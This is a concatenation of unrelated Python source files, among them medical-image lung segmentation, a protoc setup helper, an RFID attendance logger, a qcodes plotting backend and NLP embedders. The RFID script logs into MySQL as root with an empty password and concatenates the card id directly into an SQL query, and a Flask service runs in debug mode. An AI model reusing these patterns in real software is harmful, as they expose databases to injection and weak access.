alphanum_key(s): """ Turn a string into a list of string and number chunks. "z23a" -> ["z", 23, "a"] """ return [tryint(c) for c in re.split('([0-9]+)', s)] def tryint(s): try: return int(s) except: return s def list_files(dirpath, dirnames): curpath = os.getcwd() os.chdir(dirpath) f = glob.glob(dirnames) f.sort(key=alphanum_key) os.chdir(curpath) return f ############################################################################### def read_dicom(files): """ read dicom images from directory :param files: dir path that contain the dicom files :return: simpleitk image """ reader = sitk.ImageSeriesReader() dicom_names = reader.GetGDCMSeriesFileNames(files) reader.SetFileNames(dicom_names) return reader.Execute() ############################################################################### def normalise_image(image_sitk): """ :param image_sitk: :return: """ # suppress an pixel less than 20-percentile to be a background and vice versa image_array = sitk.GetArrayFromImage(image_sitk) pixels = image_array.ravel() q20 = np.quantile(pixels, 0.2) q90 = np.quantile(pixels, 0.9) norm_image = sitk.Clamp(image_sitk, lowerBound=q20, upperBound=q90) norm_image = (norm_image - pixels.mean()) / pixels.std() return sitk.RescaleIntensity(norm_image) ############################################################################### def segment_body(image_sitk): """ :param image_sitk: :return: """ # select seed point in the background seed = image_sitk.GetSize() seed = tuple(map(sub, seed, (1, 1, 1))) # region growing from the seed point seg_con = sitk.ConnectedThreshold(image_sitk, seedList=[seed], lower=-1, upper=100) # sitk.WriteImage(seg_con, 'seg_con.nii.gz') # some morphological operations to get rid of isolated islands in the background vectorRadius = (20, 20, 20) kernel = sitk.sitkBall seg_clean = sitk.BinaryMorphologicalClosing(seg_con, vectorRadius, kernel) # 
sitk.WriteImage(seg_clean, 'seg_clean.nii.gz') # reverse background mask values to get the body mask body_mask_0 = seg_clean == 0 # more morphological operations to clean the body mask vectorRadius = (3, 3, 3) body_mask_0 = sitk.BinaryMorphologicalOpening(body_mask_0, vectorRadius, kernel) # sitk.WriteImage(body_mask_0, 'body_mask_0.nii.gz') print('Refining body mask...') # find biggest connected component, which is supposed to be the body body_mask = sitk.ConnectedComponent(body_mask_0) # sitk.WriteImage(body_mask, 'body_mask_1.nii.gz') stats = sitk.LabelShapeStatisticsImageFilter() stats.Execute(body_mask) # filter out smaller components label_sizes = [stats.GetNumberOfPixels(l) for l in stats.GetLabels()] biggest_labels = np.argsort(label_sizes)[::-1] return body_mask == stats.GetLabels()[biggest_labels[0]] # biggest component has the highest label value ############################################################################### def segment_lungs(image_stik): """ :param image_stik: :return: """ # Binary threshold extracted_lungs_0 = sitk.BinaryThreshold(image_stik, lowerThreshold=20., upperThreshold=50.) # sitk.WriteImage(extracted_lungs_0, 'extracted_lungs_0.nii.gz') # some morphological operations to get rid of isolated islands in the background vectorRadius = (5, 5, 5) kernel = sitk.sitkBall extracted_lungs_1 = sitk.BinaryMorphologicalClosing(extracted_lungs_0, vectorRadius, kernel) vectorRadius = (2, 2, 2) extracted_lungs_1 = sitk.BinaryMorphologicalOpening(extracted_lungs_1, vectorRadius, kernel) # sitk.WriteImage(extracted_lungs_1, 'extracted_lungs_1.nii.gz') # find biggest connected component, which is supposed to be the body extracted_lungs_2 = sitk.ConnectedComponent(extracted_lungs_1) # sitk.WriteImage(extracted_lungs_2, 'extracted_lungs_2.nii.gz') # find biggest components stats = sitk.LabelShapeStatisticsImageFilter() stats.Execute(extracted_lungs_2) # filter out smaller components label_sizes = [stats.GetNumberOfPixels(l) for l in stats.GetLabels()] biggest_labels = np.argsort(label_sizes)[::-1] # biggest two components are the right and left lungs right_lung = extracted_lungs_2 == stats.GetLabels()[biggest_labels[0]] left_lung = extracted_lungs_2 == stats.GetLabels()[biggest_labels[1]] # some morphological operations to get rid of isolated islands in the background print('Refining lung masks...') left_lung = sitk.BinaryFillhole(left_lung) right_lung = sitk.BinaryFillhole(right_lung) vectorRadius = (20, 20, 20) right_lung = sitk.BinaryMorphologicalClosing(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalClosing(left_lung, vectorRadius, kernel) vectorRadius = (2, 2, 2) right_lung = sitk.BinaryMorphologicalOpening(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalOpening(left_lung, vectorRadius, kernel) vectorRadius = (20, 20, 20) right_lung = sitk.BinaryMorphologicalClosing(right_lung, vectorRadius, kernel) left_lung = sitk.BinaryMorphologicalClosing(left_lung, vectorRadius, kernel) # dilate the mask 2 pixels to recover the smoothing effect right_lung = sitk.BinaryDilate(right_lung, 2, kernel) left_lung = sitk.BinaryDilate(left_lung, 2, kernel) return right_lung + 2 * left_lung # return merged labels ############################################################################### # Read nifti # data_dir = '/Users/amiralansary/PycharmProjects/covid-19/data/nifti/Positive' data_dir = '/Users/amiralansary/PycharmProjects/covid-19/data/nifti/Negative' cases = list_files(data_dir, '*') for index, case in enumerate(cases): print('=' * 
20) case_path = os.path.join(data_dir, case) filename = list_files(case_path, '*.nii.gz')[0] image_path = os.path.join(case_path, filename) save_path = image_path[:-7] print('Processing subject [{}/{}] - {} ...'.format(index+1, len(cases), image_path)) image_sitk = sitk.ReadImage(image_path) print('Normalising...') norm_image_sitk = normalise_image(image_sitk) sitk.WriteImage(norm_image_sitk, save_path + '_normalised.nii.gz') print('Done!') print('Smoothing...') smooth_image_sitk = sitk.SmoothingRecursiveGaussian(norm_image_sitk, 2.) sitk.WriteImage(smooth_image_sitk, save_path + '_smooth2.nii.gz') print('Done!') print('Segmenting body...') body_sitk = segment_body(smooth_image_sitk) sitk.WriteImage(body_sitk, save_path + '_body.nii.gz') print('Done!') print('Segmenting lungs...') # mask normalised image to get rid of background body_masked_sitk = sitk.Mask(smooth_image_sitk, body_sitk) lungs_sitk = segment_lungs(body_masked_sitk) sitk.WriteImage(lungs_sitk, save_path + '_lungs.nii.gz') print('Done!') import requests from zipfile import ZipFile, ZipInfo import os import pathlib from proto_builder.core.file_utils import delete_folder, delete_file from proto_builder.core.check import check_go, check_node from proto_builder.core.bin_manager import get_platform, ProtoBin import proto_builder import click ROOT_FOLDER = pathlib.Path(proto_builder.__file__).parent # Folder where the protoc binary will be stored after download. PROTOC_ROOT_BIN_FOLDER = ROOT_FOLDER.joinpath("protobin") # Folder where the build result from Kotlin will be, variable used for clean up only. BUILD_FOLDER = ROOT_FOLDER.joinpath("build") class ZipFileWithPermissions(ZipFile): """Custom ZipFile class handling file permissions.""" def _extract_member(self, member, targetpath, pwd): if not isinstance(member, ZipInfo): member = self.getinfo(member) targetpath = super()._extract_member(member, targetpath, pwd) attr = member.external_attr >> 16 if attr != 0: os.chmod(targetpath, attr) return targetpath def download_file(url: str): """ Download file from an url. :param url Address from the file to be downloaded. """ r = requests.get(url) filename = url.split("/")[-1] open(filename, "wb").write(r.content) def setup(): """ Initialize all necessary files. This will download and install all necessary files to build the libraries for Go and Kotlin. """ system = get_platform() download_file(system.proto_c_url) with ZipFileWithPermissions(system.proto_c_zip_file_name, "r") as zip_ref: zip_ref.extractall(PROTOC_ROOT_BIN_FOLDER) delete_file(system.proto_c_zip_file_name) click.secho("Protoc binary downloaded and extracted", fg='green') setup_go() setup_node() click.secho(f"Finish setup. Binaries are on folder {PROTOC_ROOT_BIN_FOLDER}", fg='green') def setup_go(): """Check if all dependencies for Go are installed on the system. And install the necessary libraries.""" if not check_go(): raise SystemError("Install Go before proceeding.") os.system(""" go install google.golang.org/grpc/cmd/protoc-gen-go-grpc@latest go install google.golang.org/protobuf/cmd/protoc-gen-go@latest """) click.secho("Finish installing go plugin for protoc", fg='green') def setup_node(): """ Check if all dependencies for Typescript are installed on the system. And install the necessary libraries. 
""" if not check_node(): raise SystemError("Install Node before proceeding.") click.secho("Installing proto-gen-ts to generate typescript files.") os.chdir(f"{PROTOC_ROOT_BIN_FOLDER}/bin") os.system("npm install protoc-gen-ts") click.secho("Protoc-web plugin for TS downloaded and extracted", fg='green') def clean_setup(): """Clean everything that was created by the setup execution.""" click.secho("Removing all folders created when executing setup command.", fg='red') delete_folder(PROTOC_ROOT_BIN_FOLDER, BUILD_FOLDER) teguhsiswanto87/SO_AbsensiKehadiran #!/usr/bin/env python import time import RPi.GPIO as GPIO from mfrc522 import SimpleMFRC522 import mysql.connector db = mysql.connector.connect( host="localhost", user="root", passwd="", database="so_absensi" ) cursor = db.cursor() reader = SimpleMFRC522() try: while True: id, text = reader.read() cursor.execute("Select id_rfid, username FROM anggota WHERE id_rfid="+str(id)) result = cursor.fetchone() if cursor.rowcount >= 1: cursor.execute("INSERT INTO absensi (username) VALUES (%s)", (result[0],) ) db.commit() time.sleep(2) finally: GPIO.cleanup()jjberg83/python_eksperimenter #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Oct 13 08:56:01 2021 @author: jjberg """ """ Person Relation father Leia sister Han brother in law R2D2 droid relation_to_luke("") ➞ "Luke, I am your father." relation_to_luke("Leia") ➞ "Luke, I am your sister." relation_to_luke("Han") ➞ "Luke, I am your brother in law." """ def relation_to_luke(name): catalogue = { '': 'father', 'Leia': 'sister', 'Han': 'brother in law', 'R2D2': 'droid', } #return f'Luke, I am your {catalogue[name]}.' return 'Luke, I am your {}'.format(catalogue[name]) print(relation_to_luke('')) print(relation_to_luke('Leia')) print(relation_to_luke('Han')) print(relation_to_luke('R2D2')) metalibm/metalibm-clone10-100 # -*- coding: utf-8 -*- ############################################################################### # This file is part of metalibm (https://github.com/kalray/metalibm) ############################################################################### # MIT License # # Copyright (c) 2018 Kalray # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. 
###############################################################################
""" Optimization pass which unifies the pipeline stage id of nodes with an
    undefined id value """

from metalibm_core.utility.log_report import Log
from metalibm_core.core.passes import OptreeOptimization, Pass
from metalibm_core.core.ml_operations import ML_LeafNode

###############################################################################
# PASS DESCRIPTION:
# The pass implemented in this file processes an optree and propagates a
# pipeline stage id to every supported node whose stage id is still undefined
###############################################################################


def optree_set_undefined_stage(optree, stage_id):
    """ Define the init stage id for node optree if no stage has been
        previously defined (value was None) """
    if optree.attributes.init_stage is None:
        optree.attributes.init_stage = stage_id
    return optree.attributes.init_stage


def unify_stages_rec(optree, stage_id=None, memoization_map=None):
    """ Recursively propagate a defined stage id to nodes starting from optree """
    memoization_map = {} if memoization_map is None else memoization_map
    # looking into memoization map
    if optree in memoization_map:
        return optree
    # setting stage id if undefined or updating stage_id value
    stage_id = optree_set_undefined_stage(optree, stage_id)
    if isinstance(optree, ML_LeafNode):
        pass
    else:
        for op_input in optree.get_inputs():
            unify_stages_rec(op_input, stage_id, memoization_map)
    memoization_map[optree] = stage_id


class Pass_UnifyPipelineStages(OptreeOptimization):
    """ implementation of pipeline stage uniformisation """
    pass_tag = "unify_pipeline_stages"

    def __init__(self, target):
        """ pass initialization """
        OptreeOptimization.__init__(self, "unify_pipeline_stages", target)

    def execute(self, optree):
        """ pass execution """
        # the second positional argument is stage_id, so the fresh
        # memoization map must be passed by keyword
        return unify_stages_rec(optree, memoization_map={})


# register pass
Log.report(
    Log.Info, "Registering {} pass".format(Pass_UnifyPipelineStages.pass_tag)
)
Pass.register(Pass_UnifyPipelineStages)


clb6/jarvis-cli
import os
from collections import namedtuple

from jarvis_cli import config
from jarvis_cli.exceptions import JarvisPromptError


def _prompt_config_value(config_map, title, set_func, default):
    while True:
        answer = input("{0} [{1}]: ".format(title, default)) or default

        if "directory" in title and not os.path.exists(answer):
            raise JarvisPromptError("Directory {0} does not exist".format(answer))

        try:
            set_func(config_map, answer)
            break
        except TypeError as e:
            print("Not a valid value. 
Try again.") def prompt_init_config(environment, config_path): ConfigParam = namedtuple("ConfigParam", ["title", "set_func", "default"]) config_params = [ ConfigParam("Your name", config.set_author, os.getlogin()), ConfigParam("Jarvis api url", config.set_api_url, "http://localhost"), ConfigParam("Jarvis api username", config.set_api_user, ""), ConfigParam("Jarvis api password", config.set_api_password, ""), ConfigParam("Jarvis api data directory", config.set_jarvis_data_directory, "/opt/jarvis"), ConfigParam("Jarvis API snapshots directory", config.set_jarvis_snapshots_directory, config.JARVIS_CLI_DEFAULT_SNAPSHOTS_DIR) ] with config.create_config(environment, config_path) as config_map: for cp in config_params: _prompt_config_value(config_map, cp.title, cp.set_func, cp.default) from .middleware import DjangoDebugMiddleware from .types import DjangoDebug __all__ = ['DjangoDebugMiddleware', 'DjangoDebug'] 0 # source : https://github.com/yunjey/pytorch-tutorial # source : https://github.com/andrewliao11/dni.pytorch # source : https://towardsdatascience.com/multi-layer-perceptron-usingfastai-and-pytorch-9e401dd288b8src/__init__.py from .annotations import * from .widgets import * from fastapi import APIRouter router = APIRouter() @router.get("/ping") async def pong(): # some async operation could happen here return {"ping": "pong!"} #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Python字典里面不能有列表 TypeError: unhashable type: 'list' """ # d1 = {} # d2 = {3: 5} # d3 = {[1, 2, 3]: 'user'} # d4 = {(1, 2, 3): 'user'} # # print(type(d4)) # a = 10 # 局部变量,仅在本模块或类中使用,不能在函数内部以及外部使用 # def set_a(): # a = 100 # 函数变量,内部变量,仅在函数内有效 # set_a() # print(a) # a=10 # global a # 声明a为全局变量,全局变量重新赋值需要声明,调用需要导入 # http协议头部字段,并说明每个字段的主要作用 # 堆内存和栈内存的区别 # -*- coding: utf-8 -*- # # Copyright (C) 2021 CERN. # # Invenio-Drafts-Resources is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see LICENSE file for more # details. """Celery tasks to manage drafts.""" from datetime import timedelta from celery import shared_task from invenio_records_resources.proxies import current_service_registry @shared_task(ignore_result=True) def cleanup_drafts(seconds=3600): """Hard delete of soft deleted drafts. :param int seconds: numbers of seconds that should pass since the last update of the draft in order to be hard deleted. """ timedelta_param = timedelta(seconds=seconds) service = current_service_registry.get("rdm-records") service.cleanup_drafts(timedelta_param) import numpy as np import time import os try: import ipywidgets as ipw from IPython.display import display except: print('Ipywidgets not loaded!') import qcodes as qc from qcodes.plots.pyqtgraph import QtPlot from qcodes.dataset.measurements import Measurement from pysweep.databackends.base import DataParameter, DataParameterFixedSweep, DataParameterFixedAxis from pytopo.qctools.dataset2 import select_experiment import pysweep.databackends.base as base import pysweep.databackends.qcodes as qcodes_backend ''' A subclassed qcodes DataBackend, that makes live plots of 1D and 2D data. For higher dimentionality use ordinary qcodes DataBackend. ''' class DataBackend(qcodes_backend.DataBackend): def __init__(self, experiment_name, sample, station, plotting_interval: float=3, export_png=True, progress_bar=False, close_when_finished=False): ''' This is a PycQED-inspired subclass of qcodes data backend that adds 1D and 2D live plotting functionality. The backend uses QtPlot from QCoDeS for live plotting. 
Since plotting runs in the same thread as the measurement it introduces an overhead that comes from opening of the windows with plots and updating them. With plotting_interval=3 (seconds) overhead in measurement is relatively small (~10%). The backend has an option of outputting a PNG image at the end of the measurement. The figures are saved in subdirectories of the folder where database is saved. Plots titles contain information allowing to easily identify which database the data was saved in and where in the database the data is saved. At this time only 1D and 2D datasets and only point-by-point measurements are supported. 2D datasets will show correctly only if they are on a regular grid. Increasing generality is on TODO list. ''' self.plotting_interval = plotting_interval self.export_png = export_png self.progress_bar = progress_bar self.close_when_finished = close_when_finished self.experiment = select_experiment(experiment_name, sample) measurement = Measurement(self.experiment, station) super().__init__(measurement) def setup(self, paramstructure, dict_waterfall): super().setup(paramstructure, dict_waterfall) # distinguish between independent and dependent parameters # (coordinates and quantities, respectively) self.soft_sweeped_coordinates = [] self.hard_sweeped_coordinates = [] self.quantities = [] parameter_index = 0 for param in paramstructure: if isinstance(param, DataParameterFixedAxis): if ('None' in param.name) and (param.unit is 'e'): parameter_index += 1 continue self.hard_sweeped_coordinates.append({'name': param.name, 'unit': param.unit, 'coordinates': param.coordinates, 'independent': param.independent}) elif isinstance(param, DataParameterFixedSweep): if ('None' in param.name) and (param.unit is 'e'): parameter_index += 1 continue self.soft_sweeped_coordinates.append({'name': param.name, 'unit': param.unit, 'start': param.start, 'end': param.stop, 'size': param.npoints, 'independent': param.independent}) else: self.quantities.append({'name': param.name, 'unit': param.unit, 'type': param.paramtype, 'index': parameter_index, 'extra_dependencies': param.extra_dependencies}) parameter_index += 1 # to account for the parameter of # the innermost loop stored in the last column self.soft_sweeped_coordinates.reverse() self.hard_sweeped_coordinates.reverse() self.create_plots() if self.progress_bar: self.create_progress_bar() def __enter__(self): super().__enter__() # read database name and identifiers allowing # to locate the dataset in the database exp_name = self.runner.ds.exp_name run_id = self.runner.ds.run_id db_name = self.runner.ds.path_to_db.split('\\')[-1].split('.')[0] timestamp = self.runner.ds.run_timestamp() self.time = timestamp.split(' ')[1].replace(':','-') # add titles to plots for i, quantity in enumerate(self.quantities): title_list = [] title_list.append(quantity['name']) # title_list.append(exp_name) title_list.append(str(run_id)) title_list.append(db_name) title_list.append(timestamp) plot_title = ', '.join(title_list) quantity['plot'].subplots[0].setTitle(plot_title, size='7pt',color='000000') # create a directory for figures if self.export_png: fmt = '.'.join(self.runner.ds.path_to_db.split('.')[:-1]) fmt = fmt+'\\{date}\\{time}' fmt = fmt.replace('\\', '/') try: self.io = qc.DiskIO('.') except AttributeError: self.io = qc.data.DiskIO('.') loc_provider = qc.data.location.FormatLocation( fmt=fmt) self.directory_prefix = loc_provider(self.io) self.directory_prefix = '/'.join(self.directory_prefix.split('/')[:-1]) print(self.directory_prefix ) try: 
os.makedirs(self.directory_prefix) except FileExistsError: pass # a counter used to select where the new data point # should be inserted self.point_counter = 0 # initialize timer for live update self.last_update_time = time.time() return self def __exit__(self, exc_type, exc_val, exc_tb): super().__exit__(exc_type, exc_val, exc_tb) # at the end update the plots for the last time # and export figures for qi, quantity in enumerate(self.quantities): quantity['plot'].update_plot() if self.progress_bar: self.update_progress_bar() if self.export_png: run_id = self.runner.ds.run_id filename = '/'.join([self.directory_prefix, str(run_id)+'_'+self.time+'_'+quantity['name']+'.png']) quantity['plot'].save(filename=filename) if self.close_when_finished: quantity['plot'].win.close() del quantity['plot'] def add_to_line(self, line): super().add_to_line(line) for qi, quantity in enumerate(self.quantities): # case for the measured data that is returned point-by-point if quantity['type'] == 'numeric': # 1D measurement if len(self.soft_sweeped_coordinates) == 1: quantity['xvals'][self.point_counter] = line[2][1] quantity['yvals'][self.point_counter] = line[quantity['index']][1] elif len(self.soft_sweeped_coordinates) == 2: x_index = self.point_counter % self.soft_sweeped_coordinates[0]['size'] y_index = int((self.point_counter - x_index)/self.soft_sweeped_coordinates[0]['size']) # commented out because I can't get the irregular grid # to work [FKM], TODO # quantity['xvals'][y_index] = line[1][1] # quantity['yvals'][x_index] = line[2][1] quantity['zvals'][y_index,x_index] = line[quantity['index']][1] # case for the measured data that is returned line-by-line elif quantity['type'] == 'array': # 1D measurement if len(self.soft_sweeped_coordinates) == 0: quantity['yvals'][:] = line[quantity['index']][1][:] # 2D measurement elif len(self.soft_sweeped_coordinates) == 1: quantity['zvals'][:,self.point_counter] = line[quantity['index']][1][:] else: raise NotImplementedError('qcodes_with_qtplot only supports plotting 1D and 2D data') # update plot only every several (self.plotting_interval) # seconds to minimize the overhead if time.time()-self.last_update_time > self.plotting_interval: for qi, quantity in enumerate(self.quantities): quantity['plot'].update_plot() if self.progress_bar: self.update_progress_bar() self.last_update_time = time.time() self.point_counter += 1 def create_plots(self): # open each measured quantity in a separate window # this allows the user to keep only the "interesting" # dataset opened # print(self.quantities) # print(self.soft_sweeped_coordinates) for i, quantity in enumerate(self.quantities): quantity['plot'] = QtPlot(window_title=quantity['name'], figsize=(550, 300), fig_x_position=int(i/3)*0.3, fig_y_position=(i%3)*0.315) # case for the measured data that is returned point-by-point if quantity['type'] == 'numeric': # 1D measurement if len(self.soft_sweeped_coordinates) == 1: coordinate = self.soft_sweeped_coordinates[0] quantity['xvals'] = np.linspace(coordinate['start'], coordinate['end'], coordinate['size']) quantity['yvals'] = np.ones(coordinate['size']) quantity['yvals'][:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], xlabel=coordinate['name'], xunit=coordinate['unit'], ylabel=quantity['name'], yunit=quantity['unit']) # 2D measurement elif len(self.soft_sweeped_coordinates) == 2: coordinateX = self.soft_sweeped_coordinates[0] coordinateY = self.soft_sweeped_coordinates[1] quantity['xvals'] = np.linspace(coordinateX['start'], coordinateX['end'], 
coordinateX['size']) quantity['yvals'] = np.linspace(coordinateY['start'], coordinateY['end'], coordinateY['size']) quantity['zvals'] = np.ones([coordinateY['size'], coordinateX['size']]) quantity['zvals'][:,:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], z=quantity['zvals'], xlabel=coordinateX['name'], xunit=coordinateX['unit'], ylabel=coordinateY['name'], yunit=coordinateY['unit'], zlabel=quantity['name'], zunit=quantity['unit']) else: raise NotImplementedError('qcodes_with_qtplot only' 'supports plotting 1D and 2D data') # case for the measured data that is returned line-by-line elif quantity['type'] == 'array': # 1D measurement if len(self.soft_sweeped_coordinates) == 0: # check if you should use the default dependency # on hard_sweeped coordinate, otherwise find a hard_sweeped # coordinate with a matching name if quantity['extra_dependencies'] == []: coordinate = self.hard_sweeped_coordinates[0] else: for coordinate in self.hard_sweeped_coordinates: if coordinate['name'] == quantity['extra_dependencies'][0]: break quantity['xvals'] = coordinate['coordinates'] quantity['yvals'] = np.ones(coordinate['coordinates'].shape) quantity['yvals'][:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], xlabel=coordinate['name'], xunit=coordinate['unit'], ylabel=quantity['name'], yunit=quantity['unit']) # 2D measurement elif len(self.soft_sweeped_coordinates) == 1: coordinateX = self.soft_sweeped_coordinates[0] # check if you should use the default dependency # on hard_sweeped coordinate, otherwise find a hard_sweeped # coordinate with a matching name if quantity['extra_dependencies'] == []: coordinateY = self.hard_sweeped_coordinates[0] else: for coordinateY in self.hard_sweeped_coordinates: if coordinateY['name'] == quantity['extra_dependencies'][0]: break quantity['xvals'] = np.linspace(coordinateX['start'], coordinateX['end'], coordinateX['size']) quantity['yvals'] = coordinateY['coordinates'] quantity['zvals'] = np.ones([coordinateY['coordinates'].shape[0], coordinateX['size']]) quantity['zvals'][:,:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], z=quantity['zvals'], xlabel=coordinateX['name'], xunit=coordinateX['unit'], ylabel=coordinateY['name'], yunit=coordinateY['unit'], zlabel=quantity['name'], zunit=quantity['unit']) else: raise NotImplementedError('qcodes_with_qtplot only' 'supports plotting 1D and 2D data') else: raise NotImplementedError('Unsupported type of data.' ' Must be "numeric" of "array".') def create_progress_bar(self): first_quantity = self.quantities[0] if 'zvals' in first_quantity.keys(): total_datapoints = np.product(first_quantity['zvals'].shape) else: total_datapoints = first_quantity['yvals'].shape[0] self.progress_bar = ipw.FloatProgress(value=0, min=0, max=total_datapoints, description='Progress:') display(self.progress_bar) def update_progress_bar(self): self.progress_bar.value = self.point_counter me-env/me. 
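# --- Added illustrative sketch (not part of the original sources above or below) ---
# A minimal, hypothetical example of constructing the live-plotting pysweep
# DataBackend defined above; `station` is assumed to be an existing
# qcodes.Station, and the experiment/sample names are placeholders.
#
# backend = DataBackend(experiment_name='resonator_scan',
#                       sample='sample_A',
#                       station=station,
#                       plotting_interval=3,
#                       export_png=True,
#                       progress_bar=False)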
from me.logger import MeLogger, DEBUG from me.storage import StorageManagerCapsule, DataType from flask import Flask, jsonify from multiprocessing import Process from threading import Thread class BankingAPI: def __init__(self, data: StorageManagerCapsule): self.log = MeLogger(name=__name__, level=DEBUG) self.data_manager = data self.app = Flask(__name__) self._subproc = None self.app.add_url_rule(rule='/', endpoint='root', view_func=self.hello) self.app.add_url_rule(rule='/data', endpoint='data', view_func=self.data) def run(self): self._subproc = Thread(target=lambda: self.app.run(port=5001, debug=True, use_reloader=False)) # FIXME should be a proc not a thread self._subproc.start() def hello(self): return 'Hello, World! (banking service)', 200 def data(self): self.log.info('/data called in', __name__) data = self.data_manager.getAllRows(DataType.TXs) self.log.debug('retrieved data', data) return jsonify(data), 200 bayanistnahtc/seq2struct import abc import functools import os import pickle import time import bpemb import corenlp import nltk import torch import torchtext from pytorch_pretrained_bert import BertTokenizer, BertModel from seq2struct.resources import corenlp from seq2struct.utils import registry class Embedder(metaclass=abc.ABCMeta): @abc.abstractmethod def tokenize(self, sentence): '''Given a string, return a list of tokens suitable for lookup.''' pass @abc.abstractmethod def untokenize(self, tokens): '''Undo tokenize.''' pass @abc.abstractmethod def lookup(self, token): '''Given a token, return a vector embedding if token is in vocabulary. If token is not in the vocabulary, then return None.''' pass @abc.abstractmethod def contains(self, token): pass @abc.abstractmethod def to(self, device): '''Transfer the pretrained embeddings to the given device.''' pass @registry.register('word_emb', 'glove') class GloVe(Embedder): def __init__(self, kind): cache = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), '.vector_cache') self.glove = torchtext.vocab.GloVe(name=kind, cache=cache) self.dim = self.glove.dim self.vectors = self.glove.vectors @functools.lru_cache(maxsize=1024) def tokenize(self, text): ann = corenlp.annotate(text, annotators=['tokenize', 'ssplit']) return [tok.word.lower() for sent in ann.sentence for tok in sent.token] def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): i = self.glove.stoi.get(token) if i is None: return None return self.vectors[i] def contains(self, token): return token in self.glove.stoi def to(self, device): self.vectors = self.vectors.to(device) @registry.register('word_emb', 'bpemb') class BPEmb(Embedder): def __init__(self, dim, vocab_size, lang='en'): self.bpemb = bpemb.BPEmb(lang=lang, dim=dim, vs=vocab_size) self.dim = dim self.vectors = torch.from_numpy(self.bpemb.vectors) def tokenize(self, text): return self.bpemb.encode(text) def untokenize(self, tokens): return self.bpemb.decode(tokens) def lookup(self, token): i = self.bpemb.spm.PieceToId(token) if i == self.bpemb.spm.unk_id(): return None return self.vectors[i] def contains(self, token): return self.lookup(token) is not None def to(self, device): self.vectors = self.vectors.to(device) @registry.register('word_emb', 'tfidfemb') class TFIDF(Embedder): def __init__(self, kind): path = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), 'seq2struct/resources/tfidf.pkl') self.tfidf = pickle.load(open(path, "rb")) #"~/Documents/synthesis/seq2struct_tfidf/seq2struct/resources/tfidf.pkl" self.dim = len(self.tfidf.vocabulary_) 
@functools.lru_cache(maxsize=1024) def tokenize(self, text): text = text.replace('[;\", \.]', ' ').lower() return nltk.word_tokenize(text) def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): tfidf_vec = self.tfidf.transform([token])[0] return torch.from_numpy(tfidf_vec.toarray()[0]) def contains(self, token): return token in self.tfidf.vocabulary_ def to(self, device): # self.vectors = self.vectors.to(device) pass @registry.register('word_emb', 'bertemb') class BertEmb(Embedder): # # Load pre-trained model (weights) # model = BertModel.from_pretrained('bert-base-uncased') # model.eval() # # # If you have a GPU, put everything on cuda # tokens_tensor = tokens_tensor.to('cuda') # segments_tensors = segments_tensors.to('cuda') # model.to('cuda') # # # Predict hidden states features for each layer # with torch.no_grad(): # encoded_layers, _ = model(tokens_tensor, segments_tensors) # # We have a hidden states for each of the 12 layers in model bert-base-uncased # assert len(encoded_layers) == 12 def __init__(self, kind): self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') self.model = BertModel.from_pretrained('bert-base-uncased').cuda(device=torch.device('cuda')) self.model.training = False # cache = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), '.vector_cache') # self.glove = torchtext.vocab.GloVe(name=kind, cache=cache) self.dim = 768#self.glove.dim # self.vectors = self.glove.vectors # print("Glove tut") self.model.to('cuda') @functools.lru_cache(maxsize=1024) def tokenize(self, text): return self.tokenizer.tokenize(text) def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): if token not in self.tokenizer.vocab: return None encoded = self.tokenizer.convert_tokens_to_ids([token]) return self.model(torch.cuda.LongTensor([encoded]))[0][0].reshape([768]) def contains(self, token): return self.tokenizer.vocab.__contains__(token) def to(self, device): self.vectors = self.vectors.to(device) from django.db import models from django.contrib import auth from resources.models import Resource class Comment(models.Model): author = models.ForeignKey(auth.models.User) resource = models.ForeignKey(Resource, related_name="comments") content = models.TextField(null=False, blank=False) date_created = models.DateTimeField(auto_now_add=True) date_modified = models.DateTimeField(auto_now=True) def __str__(self): return self.content # -*- coding: utf-8 -*- import sys import os import re import pprint import time from PySide2 import QtCore as qtc from PySide2 import QtGui as qtg from PySide2 import QtWidgets as qtw from PySide2 import QtQml as qml CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Some example regex used to filter the files ACCEPTED_EXTENSIONS_REGEX = re.compile(r'(\w+)\.(\w+)\.(exr|tiff|png|dpx)') RENDER_LAYER_REGEX = re.compile(r'\w+_\w+_v\d{3}') pp = pprint.PrettyPrinter(indent=4) def fit_range(x, inmin, inmax, outmin, outmax): """Maps a value from an interval to another Args: x (int or float): the input value inmin (int or float): The minimum of the input range inmax (int or float): The maximum of the input range outmin (int or float): The minimum of the desired range outmax (int or float): The maximum of the desired range Returns: int or float: the computed value """ return (x-inmin) * (outmax-outmin) / (inmax-inmin) + outmin class PublishComponentsSignals(qtc.QObject): completed = qtc.Signal(list) error = qtc.Signal(str) progress = 